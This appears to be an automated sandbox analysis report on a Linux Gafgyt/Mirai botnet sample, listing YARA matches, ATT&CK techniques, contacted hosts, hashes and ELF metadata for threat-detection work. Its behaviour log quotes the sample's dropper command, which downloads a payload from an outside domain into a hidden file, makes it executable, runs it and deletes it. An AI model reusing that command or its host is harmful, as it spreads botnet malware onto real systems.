        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_859042a0 reference_sample = 41615d3f3f27f04669166fdee3996d77890016304ee87851a5f90804d6d4a0b0, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a27bcaa16edceda3dc5a80803372c907a7efd00736c7859c5a9d6a2cf56a8eec, id = 859042a0-a424-4c83-944b-ed182b342998, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
        Source: Process Memory Space: x86.elf PID: 5528, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: Process Memory Space: x86.elf PID: 5530, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: Process Memory Space: x86.elf PID: 5531, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: classification engineClassification label: mal96.spre.troj.linELF@0/0@6/0
        Source: x86.elfELF static info symbol of initial sample: libc/string/x86_64/bzero.S
        Source: x86.elfELF static info symbol of initial sample: libc/string/x86_64/memcpy.S
        Source: x86.elfELF static info symbol of initial sample: libc/string/x86_64/mempcpy.S
        Source: x86.elfELF static info symbol of initial sample: libc/string/x86_64/memset.S
        Source: x86.elfELF static info symbol of initial sample: libc/string/x86_64/strchr.S
        Source: x86.elfELF static info symbol of initial sample: libc/string/x86_64/strcmp.S
        Source: x86.elfELF static info symbol of initial sample: libc/string/x86_64/strcpy.S
        Source: x86.elfELF static info symbol of initial sample: libc/string/x86_64/strcspn.S
        Source: x86.elfELF static info symbol of initial sample: libc/string/x86_64/strlen.S
        Source: x86.elfELF static info symbol of initial sample: libc/string/x86_64/strpbrk.S
        Source: x86.elfELF static info symbol of initial sample: libc/string/x86_64/strspn.S
        Source: x86.elfELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crt1.S
        Source: x86.elfELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crti.S
        Source: x86.elfELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crtn.S
        Source: x86.elfELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/vfork.S
        Source: /usr/bin/wget (PID: 5533)File: /tmp/.....Jump to behavior
        Source: /bin/sh (PID: 5535)Directory: /tmp/.....Jump to behavior
        Source: /bin/sh (PID: 5535)Directory: /tmp/.....Jump to behavior
        Source: /usr/bin/wget (PID: 5533)Empty hidden file: /tmp/.....Jump to behavior
        Source: /tmp/x86.elf (PID: 5529)Shell command executed: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."Jump to behavior
        Source: /bin/sh (PID: 5534)Chmod executable: /usr/bin/chmod -> chmod 777 .....Jump to behavior
        Source: /bin/sh (PID: 5537)Rm executable: /usr/bin/rm -> rm -rf .....Jump to behavior
        Source: /bin/sh (PID: 5533)Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....Jump to behavior
        Source: /usr/bin/chmod (PID: 5534)File: /tmp/..... (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
        Source: /bin/sh (PID: 5534)Chmod executable with 777: /usr/bin/chmod -> chmod 777 .....Jump to behavior
        Source: /usr/bin/wget (PID: 5533)Queries kernel information via 'uname': Jump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected Gafgyt
        Source: Yara matchFile source: x86.elf, type: SAMPLE
        Yara detected Mirai
        Source: Yara matchFile source: x86.elf, type: SAMPLE
        Source: Yara matchFile source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: x86.elf PID: 5528, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: x86.elf PID: 5530, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: x86.elf PID: 5531, type: MEMORYSTR
        Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
        Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
        Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
        Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
        Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
        Source: Initial sampleUser agent string found: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Source: Initial sampleUser agent string found: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
        Source: Initial sampleUser agent string found: Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0

        Remote Access Functionality

        barindex
        Yara detected Gafgyt
        Source: Yara matchFile source: x86.elf, type: SAMPLE
        Yara detected Mirai
        Source: Yara matchFile source: x86.elf, type: SAMPLE
        Source: Yara matchFile source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: x86.elf PID: 5528, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: x86.elf PID: 5530, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: x86.elf PID: 5531, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid AccountsWindows Management Instrumentation1
        Scripting        		Path Interception1
        Hide Artifacts        		OS Credential Dumping1
        Security Software Discovery        		Remote ServicesData from Local System1
        Data Obfuscation        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
        File and Directory Permissions Modification        		LSASS Memory1
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Hidden Files and Directories        		Security Account Manager1
        Remote System Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        File Deletion        		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture11
        Application Layer Protocol        		Traffic DuplicationData Destruction

        Malware Configuration

        No configs have been found

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1686581 Sample: x86.elf Startdate: 10/05/2025 Architecture: LINUX Score: 96 27 92.60.77.69, 58154, 58156, 58158 AS-IRIDEOS-KPIT Italy 2->27 29 gay.energy 2->29 31 daisy.ubuntu.com 2->31 33 Suricata IDS alerts for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 4 other signatures 2->39 8 x86.elf 2->8         started        signatures3 process4 signatures5 41 Opens /proc/net/* files useful for finding connected devices and routers 8->41 11 x86.elf sh 8->11         started        13 x86.elf 8->13         started        15 x86.elf 8->15         started        process6 process7 17 sh sh 11->17         started        19 sh wget 11->19         started        21 sh chmod 11->21         started        23 sh rm 11->23         started        25 x86.elf 13->25         started       

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        x86.elf62%VirustotalBrowse
        x86.elf69%ReversingLabsLinux.Trojan.LnxGafgyt
        x86.elf100%AviraLINUX/Mirai.Gafgyt.

        Dropped Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        daisy.ubuntu.com
        		162.213.35.25
        		truefalse
          		high
          gay.energy
          		unknown
          		unknowntrue
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            92.60.77.69
            		unknownItaly5602AS-IRIDEOS-KPITtrue

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            daisy.ubuntu.comarm5.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.25
            arm6.elfGet hashmaliciousGafgytBrowse
            • 162.213.35.24
            rep.arc.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.24
            arm6.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.25
            Space.arm5.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.24
            Space.spc.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.25
            O4WmcV1laq.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.25
            onNhrf5u66.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.24
            NkUW8QQONi.elfGet hashmaliciousBPFDoorBrowse
            • 162.213.35.24
            7T1E6ZHN3w.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.24

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            AS-IRIDEOS-KPITarmv4l.elfGet hashmaliciousUnknownBrowse
            • 193.28.95.59
            nullnet_load.arm7.elfGet hashmaliciousMiraiBrowse
            • 109.233.129.42
            8427xbk3Zt.elfGet hashmaliciousUnknownBrowse
            • 109.233.130.43

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            No created / dropped files found

            Static File Info

            General

            File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
            Entropy (8bit):5.861227442959651
            TrID:
            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
            File name:x86.elf
            File size:136'901 bytes
            MD5:b1a9dfc6e42c89e400efad9451540b1e
            SHA1:90bec36b5d46d4f4d06d19360d217b474c9d3f32
            SHA256:5f0788259247b6d55e2d7dc87bd5ef445472cd3132b38971b3f252ee8f8ed91e
            SHA512:f38b21e75bed988979c6c08d4db928649e4a6a169787052883005e0a7bb6d1eed9928edb696a74d1840139c05ce4828707fd7c637e6399b94d722d2e8901dfdc
            SSDEEP:3072:IObua3oWiWwqgU+MdZKtXO8TmqFV+ickmr1zwT2WNn:zo85dmn3fckmr1zwT2WNn
            TLSH:8BD31937D16584BAC08712F116EFC632AD63BCFB073121572394BEA05F3289ADE99746
            File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@......Q.......Q.......................`.......`Q......`Q.....81......8...............Q.td....................................................H...._........H........

            Static ELF Info

            ELF header

            Class:ELF64
            Data:2's complement, little endian
            Version:1 (current)
            Machine:Advanced Micro Devices X86-64
            Version Number:0x1
            Type:EXEC (Executable file)
            OS/ABI:UNIX - System V
            ABI Version:0
            Entry Point Address:0x400194
            Flags:0x0
            ELF Header Size:64
            Program Header Offset:64
            Program Header Size:56
            Number of Program Headers:3
            Section Header Offset:105912
            Section Header Size:64
            Number of Section Headers:15
            Header String Table Index:12

            Sections

            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
            NULL0x00x00x00x00x0000
            .initPROGBITS0x4000e80xe80x130x00x6AX001
            .textPROGBITS0x4001000x1000xfed40x00x6AX0016
            .finiPROGBITS0x40ffd40xffd40xe0x00x6AX001
            .rodataPROGBITS0x4100000x100000x51f00x00x2A0032
            .eh_framePROGBITS0x5160000x160000x2b9c0x00x3WA008
            .ctorsPROGBITS0x518ba00x18ba00x100x00x3WA008
            .dtorsPROGBITS0x518bb00x18bb00x100x00x3WA008
            .jcrPROGBITS0x518bc00x18bc00x80x00x3WA008
            .dataPROGBITS0x518be00x18be00x5580x00x3WA0032
            .bssNOBITS0x5191400x191380x6cf80x00x3WA0032
            .commentPROGBITS0x00x191380xc180x00x0001
            .shstrtabSTRTAB0x00x19d500x660x00x0001
            .symtabSYMTAB0x00x1a1780x4db80x180x0142918
            .strtabSTRTAB0x00x1ef300x27950x00x0001

            Program Segments

            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
            LOAD0x00x4000000x4000000x151f00x151f06.39710x5R E0x100000.init .text .fini .rodata
            LOAD0x160000x5160000x5160000x31380x9e383.57640x6RW 0x100000.eh_frame .ctors .dtors .jcr .data .bss
            GNU_STACK0x00x00x00x00x00.00000x6RW 0x8

            Symbols

            NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
            .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
            .symtab0x4000e80SECTION<unknown>DEFAULT1
            .symtab0x4001000SECTION<unknown>DEFAULT2
            .symtab0x40ffd40SECTION<unknown>DEFAULT3
            .symtab0x4100000SECTION<unknown>DEFAULT4
            .symtab0x5160000SECTION<unknown>DEFAULT5
            .symtab0x518ba00SECTION<unknown>DEFAULT6
            .symtab0x518bb00SECTION<unknown>DEFAULT7
            .symtab0x518bc00SECTION<unknown>DEFAULT8
            .symtab0x518be00SECTION<unknown>DEFAULT9
            .symtab0x5191400SECTION<unknown>DEFAULT10
            .symtab0x00SECTION<unknown>DEFAULT11
            .symtab0x00SECTION<unknown>DEFAULT12
            .symtab0x00SECTION<unknown>DEFAULT13
            .symtab0x00SECTION<unknown>DEFAULT14
            C.1.3840.symtab0x414ce040OBJECT<unknown>DEFAULT4
            KHcommSOCK.symtab0x5191a04OBJECT<unknown>DEFAULT10
            KHserverHACKER.symtab0x518d404OBJECT<unknown>DEFAULT9
            LOCAL_ADDR.symtab0x51f46c4OBJECT<unknown>DEFAULT10
            Q.symtab0x5191c016384OBJECT<unknown>DEFAULT10
            UserAgents.symtab0x518c20288OBJECT<unknown>DEFAULT9
            _Exit.symtab0x40784443FUNC<unknown>DEFAULT2
            _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
            _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __CTOR_END__.symtab0x518ba80OBJECT<unknown>DEFAULT6
            __CTOR_LIST__.symtab0x518ba00OBJECT<unknown>DEFAULT6
            __C_ctype_b.symtab0x518d588OBJECT<unknown>DEFAULT9
            __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __C_ctype_b_data.symtab0x413270768OBJECT<unknown>DEFAULT4
            __C_ctype_tolower.symtab0x5191288OBJECT<unknown>DEFAULT9
            __C_ctype_tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __C_ctype_tolower_data.symtab0x414ef0768OBJECT<unknown>DEFAULT4
            __C_ctype_toupper.symtab0x518d688OBJECT<unknown>DEFAULT9
            __C_ctype_toupper.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
            __C_ctype_toupper_data.symtab0x413570768OBJECT<unknown>DEFAULT4
            __DTOR_END__.symtab0x518bb80OBJECT<unknown>DEFAULT7
            __DTOR_LIST__.symtab0x518bb00OBJECT<unknown>DEFAULT7
            __EH_FRAME_BEGIN__.symtab0x5160000OBJECT<unknown>DEFAULT5
            __FRAME_END__.symtab0x518b980OBJECT<unknown>DEFAULT5
            __GI___C_ctype_b.symtab0x518d588OBJECT<unknown>HIDDEN9
            __GI___C_ctype_tolower.symtab0x5191288OBJECT<unknown>HIDDEN9
            __GI___C_ctype_toupper.symtab0x518d688OBJECT<unknown>HIDDEN9
            __GI___ctype_b.symtab0x518d608OBJECT<unknown>HIDDEN9
            __GI___ctype_tolower.symtab0x5191308OBJECT<unknown>HIDDEN9
            __GI___ctype_toupper.symtab0x518d708OBJECT<unknown>HIDDEN9
            __GI___errno_location.symtab0x4078ec6FUNC<unknown>HIDDEN2
            __GI___fcntl_nocancel.symtab0x40774c100FUNC<unknown>HIDDEN2
            __GI___fgetc_unlocked.symtab0x40d010222FUNC<unknown>HIDDEN2
            __GI___glibc_strerror_r.symtab0x4092a814FUNC<unknown>HIDDEN2
            __GI___h_errno_location.symtab0x40bc146FUNC<unknown>HIDDEN2
